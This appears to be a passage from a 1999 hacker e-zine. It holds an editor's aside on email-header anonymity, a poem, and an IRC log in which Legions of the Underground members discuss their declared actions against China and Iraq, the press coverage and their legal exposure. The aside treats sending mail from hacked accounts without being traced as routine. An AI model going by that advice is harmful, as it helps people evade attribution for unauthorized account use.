that whatever ip you are logged in from when sending a message is INCLUDED
in the HEADERS of your message. Not everyone can see these if they are using
some shit software by a small concern called Mircosloth or Mickeysnoft or
some wacked shit like that so be forewarned, HOTMAIL IS NOT ANONYMOUS and using
a hacked acct to send the mail can be incriminating so be careful, use a mail
forwarding service like netaddress and nightmail, anyone wanna do an article
on anonymous mailing/receiving? - Ed
@HWA
3.2 Some underground prose by Liquid Phire
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I really liked this, it grabs you by the short hairs and pulls tightly
read it and understand, for this is very much what it is like to be a
part of the underground as a newbie and beyond. - Ed
Reorder
(c) 1999 phiregod
i am a hunter, searching this underground of electricity for an indiana
jones-esque treasure. i plunge through the piles of bullshit, and sever
the arteries of the sane. i found god, and i wasnt pleased, i found the
messiah, and i wasnt saved. my very soul did i lay upon the altar, and
when i lost it, i found it never was.
machiavellian superheros shook my hand and turned their backs. my vision
was clouded by the ciggerette smoke, and my voice was hindered by a well
meaning gag. i placed my hands on the planchette and found the answer
that i already knew.
on a bloody sunday, i covered my eyes as to not see the plague. i felt
the refreshing rain of revolution on my burning skin and i cried. i
climbed the highest mountian i could find, surmounted the greatest
challange and i found not even that was enough to distract me from the
pain i felt. there are too many people to save, too many to even count.
i read every bit of weathered parchment that i coud find, i plundered
the the lair of every thief in search of text that would provide
redemption. i gazed into the cherubic eyes, i smiled back at the chesire
grins, i found no path to follow. at this point it was obvious that i
would have to cut the road myself.
The line was busy.
The line was busy.
The line was busy.
The line was busy.
The line was busy.
as a draw another breath through my hookah of modern voodoo an image of
a brave new world floods my mind. this sarcophagus of a free medium is
merely another channel to convey advertisements. the few that dare to
betray what they were born for, are hunted by those that serve the
institution that we call a government. this house of cards that we
reside in will not protect us from the inevitable storm.
i have joined the danse macabre, i close my eyes to avoid the light. in
this year 1984 i feel forced to conform to a norm that doesnt exsist.
fleeting glimpses of a better place catch my eye as i take the hand of
anubis and desend into the world i belong. in these apocalyptic times it
is easier to turn away then to face the fight.
i listen to the anthems of every power crazed country, i've found
occasion to sing along, looking for a cause to fight for. more people
here are looking for fame and fortune, i became a god when i lost the
desire to obtain what i couldnt have. i was baptized in the runoff the
the information super highway, yes, it even rains in hell.
i've shed my armor of warez, i burned the castle of manuals, and i'm
trying to say what others cant put into words. i followed dante's
footsteps, and i drank hamlet's wine. if i'm going to die then i have
nothing left to lose. if i seek not fame or fortune, i have nothing left
to win. i want every scrap of information that was ever given birth to
in this maquis, i seek to become the personifacation of what no one can
have.
this is the manifesto of the product of modern life; money, comic books,
games, knowledge, and sex. i'm not claiming everyone belives this, i
doubt many of the few that will read it will understand in a vauge way
what i am trying to say. thats not a bad thing, the more poeple that are
blind, the easier it will be to slip by unnoticed. this is where i
belong, a faceless name, in all the faceless names that swarm the
internet.
phiregod
comments: liquidphire@hotmail.com
cc: hwa@press.usmc.net
I took the liberty of naming this piece "reorder" the phreaks will
understand this one, hope phiregod doesn't mind, keep writing and
don't give up, some of us do understand ... - Ed
@HWA
4.0 The LoU irc log with comments from ex-LoU member Bronc Buster
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I was unable to release this earlier because my source was not given permission
to pass this on, however things have settled somewhat and it is now "ok" to
include here so here it is in its' entirety, hopefully it will shed a bit of
light on the whole LoU situation or at least add to the intrigue, unabridged
please note that none of this information has been confirmed and the source is
"unknown" please remember this when reading, however it does look legit and jives
with what we have seen in the past regarding the LoU story, machine names of people
joining the chat have been REMOVED by me for obvious reasons ...
* NOTE * An informative message and some enlightened words follow this log
(no apologies for the length we try to put out news with as little 'editing' as
possible..) from Bronc Buster whom has, effective two days prior to this writing
resigned from LoU on friendly terms. - Ed
Subject: IRC log
Date: Thu, 21 Jan 1999 19:36:16 +0100
From: "John" <ruffneck@xxxxxxx.xxx>
To: <cruciphux@dok.org>
Hi!
<snip>
Here's the complete log of the IRC meeting of LoU and others...
<snip>
Session Start: Wed Jan 20 02:34:46 1999
* Logging #event to '#event.log'
[02:34] *** Now talking in #event
[02:38] *** Joins: kInGb0nG (~lil_b0ng@*!*.com)
[02:45] *** Joins: m0f0__ (synnergy@*!*.??)
[02:46] *** m0f0 is now known as fewer
[02:47] <delam> heh
[02:47] <m0f0_> is it fixed yet?
[02:48] <delam> which problem is that?
[02:48] <m0f0_> the bitchx one
[02:48] <delam> I'm compiling bitchx right now on the server
[02:48] *** Quits: feur (irc, where is the wizard of OZ)
[02:48] <m0f0_> ok, i compiled, epic, ircii, sirc.. but i don;t like them
all
[02:49] *** Quits: m0f0- (Leaving)
[02:49] *** Quits: fewer (Leaving)
[02:49] *** Quits: m0f0__ (Hey! Where'd my controlling terminal go?)
[02:49] *** m0f0_ is now known as m0f0
[02:49] <delam> what did you find bitchx was doing or not doing?
[02:49] <m0f0> it says nick not registered yet
[02:50] <m0f0> you can join a channel, but not talk in there
[02:51] *** Joins: feur (~cifer@*!*.rr.com)
[02:51] <delam> weird
[02:54] <dyslexia> some people are still getting a no more connectiions i=
n
your class message
[02:55] <delam> that's bizzare.. lemmy check the classes 1 more time
[02:55] <m0f0> rehash the server?
[02:55] *** Joins: lothos (lothos@*!*.??)
[02:57] <delam> class 10 is set to 100, class 2 is set to 50 and class 1 =
is
set to 400
[02:58] <delam> just HUP'ed to make sure it's loaded
[02:58] *** Joins: cd (~gerrie@*!*.net)
[02:58] <m0f0> ok, let's see then
[03:00] <optiklenz> ok
[03:00] *** Joins: sdak (synnergy@*!*.net)
[03:00] *** Quits: sdak (BitchX by any other name is still BitchX)
[03:00] <m0f0> bitchx still flips here, bleh
[03:00] *** Joins: Kanuchsa (das@*!*.com)
[03:02] *** Joins: DigiEbola (digi@*!*.net)
[03:02] <DigiEbola> ok
[03:02] <DigiEbola> cant you this type?
[03:02] <m0f0> yeah, you dweeb
[03:03] * feur is away, autoaway [log:ON] [page:ON]
[03:03] *** Quits: Kanuchsa (: Xing)
[03:03] *** Joins: Winn (Winn@*!*.uu.net)
[03:03] *** Joins: MsIW (Beachie@*!*.uu.net)
[03:04] *** Parts: lothos (lothos@*!*.??)
[03:04] *** Joins: lothos (lothos@*!*.jp)
[03:05] *** lothos is now known as lothos-
[03:06] *** Quits: MsIW (Hey it has been fun! Thanks!!! Hugs!!! Kiss!!!)
[03:06] <m0f0> heh
[03:07] <DigiEbola> heh
[03:07] <Winn> What happned to MS?
[03:07] * m0f0 wonders
[03:07] <lothos-> .
[03:08] <DigiEbola> uggy uggy ircII
[03:08] <Winn> shes had dialup probs
[03:08] <Winn> delam - dude!
[03:08] <delam> hey :)
[03:08] *** Joins: Mark668 (~irc@*!*.pacbell.net)
[03:08] <feur> allright, we are waiting for some folks then we will begin=
,
[03:08] <Winn> we're wating for a couple more.
[03:08] <delam> winn I think I'm outdated here heh
[03:08] <Winn> hehehehe... who;s the oldest here?
[03:09] <Mark668> 46
[03:09] <m0f0> woo
[03:09] <feur> 49
[03:09] <Mark668> Yo, Lou.
[03:09] <DigiEbola> 69 1/2
[03:09] *** Joins: MsIW (Beachie@*!*.uu.net)
[03:09] <delam> not to sound like "I remember the old days" but I did mos=
t
of my IRC in 90-91
[03:10] <Winn> I am not OLD!!! :-)
[03:10] <MsIW> Winn is old.
[03:10] <MsIW> :)
[03:10] <Winn> shut up!
[03:10] <MsIW> LOL!!!
[03:10] <Winn> 3 years and counting iw
[03:10] <feur> 5 minutes and counting
[03:10] <Winn> who are we missing?
[03:11] <lothos-> I'm ahhh 20. I thought I was old...
[03:11] <m0f0> alot
[03:11] <delam> I have some old logs with the MOD/LOD wars in #hack on th=
e
original IRC server :)
[03:11] <optiklenz> 24 here
[03:11] <optiklenz> who's the oldest?
[03:11] <DigiEbola> im going to be 22 next month
[03:11] <kInGb0nG> 26
[03:11] <m0f0> i love to be 18
[03:11] * optiklenz waits patiently
[03:11] <Winn> i was once... when I was in r'n'r
[03:11] <m0f0> esp in the netherlands..
[03:11] <Winn> if that where you are?
[03:12] <m0f0> heh
[03:12] <dyslexia> heh
[03:12] <Winn> Mofo - say hi to Rene.
[03:12] <m0f0> hmm
[03:12] *** Joins: legions (~fff@*!*.net)
[03:12] *** legions is now known as datapleX_
[03:12] <datapleX_> hrm
[03:13] <optiklenz> legions?
[03:13] <optiklenz> ah
[03:13] <DigiEbola> hah
[03:13] * datapleX_ shrugs
[03:13] <optiklenz> basterd
[03:13] <m0f0> he must feel eweet
[03:13] <optiklenz> heh
[03:13] <kInGb0nG> heh
[03:13] <datapleX_> optik: it somehow got to mah alternative in mirc
[03:13] <optiklenz> ah
[03:13] * DigiEbola is not going say a word about windows tonight.
[03:13] *** datapleX_ changes topic to 'bah?'
[03:13] *** Quits: datapleX (Read error to
datapleX[tcnet06-26.sat.texas.net]: EOF from client)
[03:13] <optiklenz> hehe
[03:13] *** datapleX_ is now known as datapleX
[03:13] <optiklenz> i was going to say that
[03:13] <m0f0> bitchx, sirc don't work on this server
[03:14] *** Quits: lothos- (Excess Flood)
[03:14] <Mark668> I've not used irc much --- what's all the "heh"s mean?
[03:14] <delam> hahah japan? :)
[03:14] <m0f0> like, doh?
[03:14] <optiklenz> when someone says something funny
[03:14] <optiklenz> you say heh
[03:14] <Mark668> Thanks.
[03:14] <DigiEbola> mark: its the digital equivelent to a laugh
[03:14] <DigiEbola> heh
[03:14] <m0f0> heh
[03:14] <DigiEbola> try it
[03:14] <DigiEbola> =3D)
[03:14] <Mark668> Heheheheheheheh
[03:14] <m0f0> aww
[03:15] <DigiEbola> THERE YA GO!
[03:15] <m0f0> we made him laugh
[03:15] *** Joins: maquis (~me@*!*.internic.net)
[03:15] * optiklenz claps
[03:15] <Mark668> That felt virtually good
[03:15] <delam> MuahahahaHAHAHAHaHAHaHA
[03:15] <maquis> ahhhh
[03:15] <delam> :)
[03:15] <m0f0> lol
[03:15] <optiklenz> grand job
[03:15] <MsIW> welcome maquis
[03:15] <maquis> hello all
[03:15] <dyslexia> now thats an evil laugh
[03:15] <DigiEbola> bwahahaha
[03:15] <optiklenz> welcome out of the sockets of being a "heh" virgin
[03:15] <maquis> <DEVIOUS CACKLE HERE>
[03:15] <Mark668> What time do we start?
[03:15] <datapleX> when is the meeting officialing beginning?
[03:15] <maquis> I was told 2100 ET
[03:15] <optiklenz> I'm not even sure of what this whole things about
[03:15] <m0f0> 15 mins ago
[03:16] <Winn> <HEH> should trigger Shockwave
[03:16] <optiklenz> so again my curiousity is getting the best of me
[03:16] <Mark668> Yep.
[03:16] *** Joins: lothos (lothos@*!*.net)
[03:16] <Mark668> Back in a minute ... I need another glass of wine.
[03:16] <Winn> red I hope
[03:16] <DigiEbola> curiosity killed the cat, so whylome wont
[03:16] <m0f0> hmm, let do some weed then also
[03:16] <delam> John Lee used to be the most annoying bastard in IRC backin
1991 with his substitution program
[03:16] *** Joins: Father (Agrosso@*!*.att.net)
[03:17] <Winn> welcome father!
[03:17] <maquis> <-- genuflects
[03:17] <delam> forgive me father for I have sinned
[03:17] <Winn> damn right
[03:17] <delam> heh
[03:18] <DigiEbola> father, yes son, i wanna kill you.....
[03:18] <delam> winn I don't think these guys even know our episodes
[03:18] * MsIW bows to the higher power
[03:18] <m0f0> zZZzz
[03:18] <datapleX> digi: I am thinking of an orbital song right now...
[03:18] <datapleX> ;)
[03:18] <m0f0> i'm thinking of my girl
[03:18] <DigiEbola> data: ah youngone
[03:18] <m0f0> she's wild
[03:19] <DigiEbola> m0f0: does she do things, real fast and then real slow?
[03:19] <m0f0> heh
[03:19] <m0f0> you moron
[03:19] <DigiEbola> hahaha
[03:19] <m0f0> Digi: what about your gaymate?
[03:20] <DigiEbola> m0f0: myself more like it
[03:20] <feur> let's begin, as others will join
[03:20] *** Joins: pent (dschwarz@*!*.net)
[03:20] <DigiEbola> m0f0: it really is a problem, when i argue with
myself....
[03:20] <lothos> let's start
[03:20] <maquis> start away
[03:21] <Winn> feur - you set the stage please
[03:21] <datapleX> WOW...what a great start that was :)
[03:21] <MsIW> I agree lothos
[03:21] <maquis> ...the drum roll please.....
[03:21] <lothos> thanks Ms. IW
[03:21] <feur> i understand there is an attorney amongst us
[03:22] <Winn> That would be father
[03:22] <datapleX> maybe we could start w/ an introduction so that we can
establish who is who?
[03:22] <optiklenz> that'd be nice
[03:22] <Father> Who goes first?
[03:22] <m0f0> why are we here?
[03:23] <Winn> I am Winn Schwartau, Infowar.Com - no handle. :-)
[03:23] <lothos> I am Lothos. :-)
[03:23] <Winn> that helps! :)
[03:23] <lothos> RootFest organizer, member of LoU
[03:23] <optiklenz> I'm Steve Stakton www.legions.org
[03:23] <optiklenz> you guys know the handle
[03:23] <optiklenz> =3D]
[03:23] <m0f0> I am m0f0, now from africa
[03:23] <lothos> www.rootfest.org
[03:23] <maquis> I am Maquis (Rick) work at Internic...friend of INFOWAR.COM
[03:23] <datapleX> heh
[03:23] <delam> I am the Evil Dr. Delam, 2600 writer.. cover of spring 1996
:), phrack, empire times, etc, writer of the first keystroke capture program
DEPL.. etc etc
[03:23] <dyslexia> i am dyslexia, currently residing underneath you all
[03:24] <DigiEbola> I am Digital Ebola , LoU member, Senior Editor of Keen
Veracity
[03:24] <datapleX> uhm...I would be someone no one knows, or really cares to
know
[03:24] <lothos> i THOUGHT I'd be in 2600, but the new issue came out and I
guess not...
[03:24] <lothos> heh
[03:24] <kInGb0nG> kingb0ng, software developer, LoU member
[03:24] <maquis> is the new ish out yet, then?? havent seen it anywhere
[03:24] <MsIW> I suggest that Winn or Feur begin this gig
[03:24] <datapleX> feur: who are you?
[03:24] <feur> i am just an old man who futz's with infosec
[03:24] <datapleX> k
[03:24] <datapleX> ...go ahead
[03:25] <Winn> OK. A couple years back, some hackers decided to declare war
on France. They wanted CNN to watch and asked me to help.
[03:25] * optiklenz slips on his foot warmer
[03:25] <Winn> I advised them that would be a bad idea and finally with the
help of some understanding feds talked them out of it.
[03:25] <Winn> So, I guess, we are interested in where the current
activities are taking us. Comments?
[03:25] <optiklenz> ok
[03:26] <Winn> So, recently, as I heard it, LoU chose China and Iraq as
targets. Is that right?
[03:26] <optiklenz> first I'd like to clear up some misconceptions brought
about by some bad press
[03:26] <Winn> Thank you!!
[03:26] <maquis> most of it's bad press.
[03:26] <optiklenz> ok
[03:27] -pent:#event- betty, come to elite.net for a sec please
[03:27] <optiklenz> The press for so long has been so occupied with making
news they are not concentrating on reporting the news
[03:27] <optiklenz> LoU is devised of members who enjoy all aspects of
computing and hold strong ethics
[03:28] <optiklenz> A few of the members decided to speak out against the
current human rights issue as it is in china
[03:28] -pent:#event- he wanted me to call barry person collect, but i
chickened out
[03:28] -pent:#event- thats the last i saw of him
[03:28] <optiklenz> the actions they decided to make was that of those
members, and those members alone at that moment, and time LoU was not
interested in anything they were doing although our support was there
[03:29] -pent:#event- why is the talking screwed up ?
[03:29] <optiklenz> Most of the members have high paying network jobs so no
one really had the time
[03:29] -pent:#event- : idle : 2 hours 30 mins 56 secs (signon: Tue Jan
19 18:11:19 1999)
[03:29] -pent:#event- he fell asleep
[03:30] <m0f0> someone kill pent?
[03:30] <datapleX> pent: please quit using notices
[03:30] <datapleX> who here is a federal agent of some kind?
[03:30] <lothos> not me!
[03:30] <optiklenz> We never said we were going to "destroy" anything
[03:30] <maquis> not me
[03:30] <Winn> none I know of
[03:31] <lothos> I was told there would be an fbi agent of some sort here.
[03:31] <optiklenz> all though by word of mouth, and the press putting in
their two cents it was stated that it was our goal to totally shutdown these
other countries
[03:31] <feur> there is currently none on, if one comes on, we will
immediately notify the channel
[03:31] <optiklenz> That sounds like something out of a sci-fi flick
[03:31] <datapleX> was one invited?
[03:31] <Winn> What "manifesto" so-to-speak created the impression of
infrastructure targeting?
[03:31] <MsIW> major lag back in a minute
[03:31] <feur> yes, two were
[03:32] <optiklenz> none of them
[03:32] <optiklenz> our primary goal was the bring awareness
[03:32] <optiklenz> nothing more nothing less
[03:32] <MsIW> yes dataplex. one was invited
[03:32] *** Quits: MsIW (Hey it has been fun! Thanks!!! Hugs!!! Kiss!!!=0F)
[03:32] <delam> was it the press that got screwed up or did someone pose as
a member and say this stuff?
[03:32] <Winn> Human rights in China... and Iraq?
[03:32] <lothos> one was? or two?
[03:33] <lothos> mosthated posed as a member for some press release
[03:33] *** Joins: MsInfoWar (Beachie@*!*.uu.net)
[03:33] <lothos> nationalpost.com or something
[03:33] <Winn> and he claimed.....?
[03:33] <optiklenz> we brought about the fundamental freedoms bequeathed to
us by the Constitution
[03:33] <optiklenz> freedoms that the people we spoke for only wished the=
y
had
[03:33] <lothos> something like LoU were terrorists
[03:34] <delam> how do you guys relate to mosthated?
[03:34] <optiklenz> we dont
[03:34] <optiklenz> I dont even know the guy
[03:34] <Winn> that's the spin I heard... how many were in on that 'spin'
versus a HR action.
[03:34] <optiklenz> none of the members did until he pulled that stunt wi=
th
the national post
[03:34] <feur> optik, did you notify national post
[03:34] <optiklenz> you mean the dismanteling of chinese firewalls?
[03:34] <optiklenz> I notified no one
[03:35] <Winn> If it
[03:35] <optiklenz> As far as i was concerned this matter was not that of
the press
[03:35] <optiklenz> and never should of been
[03:35] <feur> notify national post of mosthated's non-affiliation
[03:35] <optiklenz> Im not sure if any of the members did
[03:35] <Winn> If it's awareness, then did anyone consider an EDT-like
action?
[03:35] <optiklenz> but I will most definitly look into that
[03:36] <optiklenz> I posted a second rebuttal. It explains a lot if you=
'd
take the time to read it
[03:36] <optiklenz> www.legions.org/reb2.txt
[03:36] <Winn> OPTIK: URL?
[03:36] <Winn> sorry...
[03:36] <optiklenz> members of LoU have met up with 2600, L0pht and other
people to clear things up
[03:37] <optiklenz> infact just a few weeks ago bronc was at dinner with
emmanuel and issac from the 2600 staff setting things straight
[03:37] <feur> winn, to get with the program, we got together to help LOU=
,
not pimp them
[03:37] <optiklenz> Things were posted and said that were totally false
[03:38] <delam> have you guys been taking any heat from other hackers or
from anyone else?
[03:38] <optiklenz> no
[03:38] <feur> optik, are you under any guidance from counsel now
[03:39] <m0f0> only in lame greetings
[03:39] <optiklenz> the only thing I fear is some chinese loyalist knocki=
ng
at my door ready to spike my head into the punch bowl
[03:39] <DigiEbola> my fears exactly
[03:39] <lothos> the only heat we've gotten that I know about is the
cDc/2600/l0pht rebuttal
[03:39] <optiklenz> If you guys have the time check out http://pseudo.com
they host a show called parse
[03:40] <feur> optik, are you under any guidance from counsel now
[03:40] <optiklenz> no
[03:40] <optiklenz> Im just trying to get things back to normal
[03:40] <feur> is anyone in legions represented by counsel
[03:40] <optiklenz> as in?
[03:40] <optiklenz> a lawyer of some sort?
[03:40] <feur> yes
[03:40] <optiklenz> lawyers are for criminals
[03:41] <lothos> not I.
[03:41] <optiklenz> and we have commited no crime
[03:41] <DigiEbola> not I. I actually have no lawyer
[03:41] <dyslexia> nor i
[03:41] <feur> and also buffers for fearful apparitions
[03:41] <lothos> I agree with optik, lawyers are for criminals. :-)
[03:41] <optiklenz> We'd like to set things straight
[03:42] <optiklenz> with you, with the "hacking" community, with federal
angencies whomever
[03:42] <delam> I'd bet that after the press you probably have some feds
curious
[03:42] <m0f0> they already are
[03:42] <Father> Hmmm. Are lawyers for criminals, or for people whom oth=
er
people claim are criminals?
[03:42] <delam> how do you know?
[03:42] <lothos> I got almost 50 .mil and .gov hits to rootfest.org in th=
e
past four days
[03:42] <dyslexia> delam, both wired and the national post have quotes fr=
om
feds
[03:42] <Winn> OPT: Your posting says a polish grp did stuff you got blam=
ed
for. What happened?
[03:42] <maquis> from what i've seen the feds have no clue...they're prol=
ly
the LAST thing to worry about....
[03:43] <lothos> thats good to know, maquis
[03:43] <m0f0> maybe to find us, or to get prove? curious they are
[03:43] <optiklenz> Winn> a polish group got the wrong idea and basically
went out attacking chinese sites saying they were doing it for our effory=
t
[03:43] <DigiEbola> I am more worried about .cn, then feds at this time
[03:43] <optiklenz> effort rather
[03:43] <datapleX> maquis: what does internic have to do with this(if you
are representing them at this meeting that is)?
[03:43] <maquis> < - not representing internic....mearly logged in from
there. :)
[03:43] <lothos> i think he said he was with infowar...
[03:44] <maquis> < - friend of infowar.com
[03:44] <feur> maquis, they probably have high interest due interfere in
geopolitical theater
[03:44] <datapleX> oh
[03:44] <delam> that's a cool place to log in from, can I have an account=
?
:)
[03:44] <maquis> yeah, right....:)
[03:44] <m0f0> yeah, hook us up
[03:44] <optiklenz> www.pseudo.com/links/playlast.asp?archtype=3Dvid&show=
id=3D21
[03:44] <delam> never hurts to ask :)
[03:44] <maquis> har. i can arrange tours though.... :)
[03:44] <optiklenz> thats the last parse episode if anyone wants to check=
it
out
[03:44] <delam> cool!
[03:45] <DigiEbola> ill remember that when im in the area hehee
[03:45] <optiklenz> bronc went on and represented the legions team basica=
lly
just setting the record straight and telling everyone the real deal
[03:45] <DigiEbola> "whats this button do!? ewpzie"
[03:45] <Winn> Does your URL rep the real deal? Is this the current
position?
[03:45] <DigiEbola> bronc did a fine job of representation
[03:45] <optiklenz> yes
[03:45] <optiklenz> actually if everyone wants
[03:45] <optiklenz> play the url i just posted
[03:46] <optiklenz> set the buffer to about 25
[03:46] <optiklenz> Thats about when bronc starts talking
[03:46] <feur> optik, when all this broke, were you in violation of
probation
[03:46] <optiklenz> No
[03:46] <optiklenz> I went to texas for awhile to stay with a friend
[03:47] <optiklenz> to get away from the media, and well everything else
that could happen if worst came to worst
[03:47] <MsInfoWar> was bronc invited to come tonight?
[03:47] <datapleX> is mark awake?
[03:47] <optiklenz> Bronc was but he declined
[03:47] <optiklenz> he was unsure of what to make of tonights get togethe=
r
but i will relay everything him
[03:47] <optiklenz> to him
[03:47] <feur> how members have been contacted by us and other country
intelligence or law enforcement agencies
[03:47] <Winn> I met up with the EDT this weekend and they want to contin=
ue
strong HR and political actions. Do you want to continue to speak out?
[03:48] <lothos> question. who/what is EDT?
[03:48] <optiklenz> We do as long as everyone understands that we are not
criminals
[03:48] <Winn> Electronic Disruption Theater
[03:48] <Winn> They are on line activists
[03:48] <datapleX> HR =3D ?
[03:49] <optiklenz> and we are merely speaking on what we beleive to be
amended
[03:49] <lothos> I am NOT a criminal. I'll say that now.
[03:49] <optiklenz> data>human rights
[03:49] <datapleX> k
[03:49] <Winn> To them it's an Art Form to protest.
[03:49] <Father> I think that's what RTM & Eugene AlterNIC said.
[03:49] <delam> scary
[03:49] <DigiEbola> I do not want us to go down as criminals or martyrs
[03:50] <optiklenz> Winn> our foremost intent as of right now is to get
things cleared
[03:50] <optiklenz> before we continue speaking on human rights we'd like=
to
make certain that people understand who we are and where we are coming fr=
om
[03:50] <Winn> How can we help get your message across?
[03:50] <optiklenz> not precisely where we are coming from but you get th=
e
idea
[03:50] <optiklenz> =3D]
[03:50] <DigiEbola> A lot of people have asked us that same question.
[03:51] <m0f0> i'm from greek now at the moment
[03:51] <optiklenz> Some funding would be nice
[03:51] <optiklenz> =3D]
[03:51] <DigiEbola> including cbs and nbc from what i understand
[03:51] <optiklenz> but i dont see that
[03:51] <delam> heh
[03:51] <optiklenz> so lets move on shall we
[03:51] <optiklenz> heh
[03:51] <DigiEbola> what makes you people any different from the rest?
[03:51] <maquis> cbs/nbc there's media for ya....urg....TWPPT!
[03:51] * optiklenz urges mark to flutter his "heh's"
[03:51] * DigiEbola senses pimping.
[03:51] <m0f0> lol
[03:52] <maquis> theres a difference between the "media" and those of us =
in
the know like Winn, me, etc. that actually have some credibility in the
IT/IS/INFOSEC world...
[03:52] <feur> father, as an attorney i know you can only suggest ideas, =
non
directed, could you be of assistance
[03:52] <optiklenz> Winn> Maybe if you make a statement speaking on our
bedrock
[03:52] <optiklenz> made a statement even
[03:53] <maquis> people i have seen trust us more than the Big Media
Mongrels...
[03:53] <optiklenz> I've visited infowar a few times and I've seen archiv=
es
of media corrupt media to put it another way
[03:53] <Winn> I think that getting unedited, well structured positions o=
ut
to larger audiences is critical to any message.
[03:53] *** Quits: MsInfoWar (Ping timeout for
MsInfoWar[1Cust33.tnt4.st-petersburg.fl.da.uu.net]=0F)
[03:53] <optiklenz> It's spreaded infectiously
[03:53] <maquis> getting raw data, no spin, edits, etc....i agree that's =
the
way to go....
[03:54] <delam> one point of interest that I know of when you have a "gro=
up"
with a name is legally there are more things they can do to you.. MOD had
problems with that.. the people I was with we stayed away from having a
group name
[03:54] <maquis> but it can't appear to be from "kiddies" and look immatu=
re.
like Winn says, wellbalanced and well presented stuff.
[03:54] <Mark668> {sorry, I had to attend to other stuff for a minute:
hehehehehehe]
[03:54] <Father> First, I am not acting as an attorney here (as Winn know=
s).
[03:54] *** Joins: MsInfoWar (Beachie@*!*.uu.net)
[03:54] <DigiEbola> hmm
[03:54] <optiklenz> we have no legal name
[03:54] <optiklenz> heh
[03:54] <lothos> hahah
[03:55] <optiklenz> Lets see
[03:55] <DigiEbola> I am concerned tho, no body does anything for free
[03:55] <optiklenz> one sec
[03:55] <optiklenz> Lets take the police department
[03:55] <Father> Second, I need to know what (1) what the problem *is*, a=
nd
(2) what th desired result is.
[03:55] <optiklenz> If you have one bad cop and this guy goes out and
murders someone
[03:55] <optiklenz> is the whole police deparment at fault?
[03:55] <optiklenz> do they all get the death sentance?
[03:55] <optiklenz> are they all punished ?
[03:55] <optiklenz> absolutely not
[03:55] <delam> no but there is "racketeering" and conspiracy etc
[03:55] <optiklenz> Because then we'd have no cops
[03:55] <Father> Sometimes. Not legally, but in fact.
[03:55] <optiklenz> if that were the case
[03:55] * datapleX feels that isn't a good example...
[03:56] <optiklenz> everyone department has a good and a bad
[03:56] <optiklenz> to stick us in the middle isn't any different
[03:56] <delam> I know what you're saying, but being a group there are la=
ws
that apply to groups of people that can be more harsh
[03:56] <delam> maybe father can help me out on this
[03:56] <DigiEbola> I am just trying to understand everyones motives, why
give a care about LoU?
[03:57] <Father> P.S. I think Winn invited me because I am a former Fed.
Pros. Be warned.
[03:57] <optiklenz> ok
[03:57] <optiklenz> now is a good time to pee my pants i guess
[03:57] <feur> digi, we spoke the other night, i believe my generation ha=
s
an obligation to assist, but not be suckers
[03:57] <DigiEbola> Winn is associated with gov, that scares me in itself
[03:57] * datapleX cares not about feds because he never did NEthing wron=
g
[03:57] *** Joins: ice (~ice@i.like.to.eat.negrofish.net)
[03:58] <Father> Delam. If a group acts as a group to break the law,
various serious penalties come into play that
[03:58] <DigiEbola> feur: true, but everyone always has a motive
[03:58] <optiklenz> Father> yes but we are not a mafia
[03:58] <Father> would not apply to an individual based upon his own
separate acts.
[03:58] <optiklenz> we are not into "organized crime"
[03:58] <feur> i think this groups agenda is somewhat up front
[03:58] <Winn> I am associated with hackers and that scares the hell out =
of
the feds!
[03:58] <optiklenz> every member has their own program
[03:58] <delam> optik: MOD wasn't mafia either but they had some major
problmes
[03:58] <dyslexia> Winn, heh
[03:58] <Father> Te questions is: did the group have a common purpose to=
do
something the law says is illegal.
[03:59] <optiklenz> We are all adults no one can police what another pers=
on
does
[03:59] <maquis> i'm associated with Winn, that scares the hell out of ME=
!!!
heheheehe
[03:59] <Winn> HA!
[03:59] <dyslexia> lol
[03:59] <optiklenz> Father> nope
[03:59] <optiklenz> never had never will
[03:59] <optiklenz> We are a research group
[03:59] <Winn> Is this the "Yelling Fire
[03:59] <Winn> arguement?
[03:59] <datapleX> I thought is was wolf...?
[04:00] <datapleX> erm...n/m
[04:00] <optiklenz> We've worked with lots of major corporations, and we =
are
not about to blow our rep
[04:00] <optiklenz> its Crying Wolf
[04:00] <optiklenz> i beleive
[04:00] <optiklenz> Yelling fire is what old people do when they cant get
out of bed in time
[04:00] <delam> worked with corporations? what kinda work is it,
penetration testing?
[04:00] <Father> The conclusion that a group had the requisite common
purpose is drawn by agents, prosecutors, judges, and jurors. Even Bill
Clinton says he didn't lie, because is ain't is.
[04:01] <optiklenz> delam> programing, hosting, design, security
consultation
[04:01] <DigiEbola> our common purpose is research
[04:01] <optiklenz> you name
[04:01] *** Joins: sreality (sreality@*!*.org)
[04:01] <optiklenz> it
[04:01] <delam> k
[04:01] <Winn> I meant did you offer subtle encouragement for others to t=
ake
an action and is that really wrong?
[04:01] <optiklenz> no
[04:01] <optiklenz> No one took any action
[04:01] <optiklenz> thats the point we are trying to make
[04:02] <optiklenz> none of the members did a cotten pickin thing
[04:02] <Father> Winn - the answer to the second part of your question,
legally speaking, is yes.
[04:02] <Winn> DId others, tho? THe Poles? Ideas are free and legal.
[04:02] <optiklenz> The Poles did
[04:02] <Winn> Are you saying Dad, that there might be legal culpability =
fo
their ideas?
[04:02] *** Quits: pent (=F9=ED=F9 Total uptime : 0d 0h 42m 42s=0F)
[04:02] <DigiEbola> can one be prosecuted for having a idea?
[04:02] <optiklenz> We claim no affiliations
[04:02] <optiklenz> whatever the polish people do in poland is on them
[04:03] <Father> I don't answer to "Dad."
[04:03] <lothos> no digi
[04:03] <lothos> this isn't 1984 I don't think.
[04:03] <Father> Sore point, Winn.
[04:03] <optiklenz> what we are saying here to night is we spoke our mind=
we
let people know what we were thinking and if that is a crime then I shoul=
d
be sentanced to death
[04:03] <optiklenz> because that is something I do
[04:03] <optiklenz> time and time again!
[04:03] <DigiEbola> lothos: ya never know....
[04:03] <Winn> Sorry, Father... :( I slap myself silly...
[04:03] <m0f0> i would be way under ground then
[04:04] <Father> Nor "Pop"
[04:04] <Father> "Hey you" might work.
[04:04] <delam> padre? :)
[04:04] <Father> Hmmm. Not bad.
[04:05] <Father> Thoughts ain't a crime.
[04:05] <optiklenz> yeah
[04:05] <Winn> Legally, that is. :-)
[04:05] <optiklenz> if it was my next door neighbor could very well sue m=
e
for harassment
[04:05] <optiklenz> =3D]
[04:05] <lothos> hahah
[04:06] <Father> Two people agreeing (real low threshold) about something=
,
and one of them doing a little something about it qualifies as a conspira=
cy:
5 years, $250K.
[04:06] <optiklenz> god knows what I've been thinking
